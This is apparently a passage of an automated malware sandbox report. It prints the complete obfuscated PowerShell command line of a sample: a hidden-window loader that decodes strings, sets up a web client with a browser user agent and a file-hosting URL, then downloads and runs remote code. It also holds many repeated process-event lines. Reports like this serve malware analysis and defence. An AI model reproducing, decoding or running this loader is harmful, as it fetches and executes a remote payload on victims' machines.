MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Barnp G ne ');$Emplanes=Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve: Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede ' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer ');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig= (hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib- Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster Virko Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3466122F pushfd ; ret 3_2_00007FFD34661232
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0443E3B0 push eax; retf 6_2_0443E3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0443FE03 push esp; retf 6_2_0443FE09
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07160638 push eax; mov dword ptr [esp], ecx6_2_07160AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07160AAC push eax; mov dword ptr [esp], ecx6_2_07160AC4
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
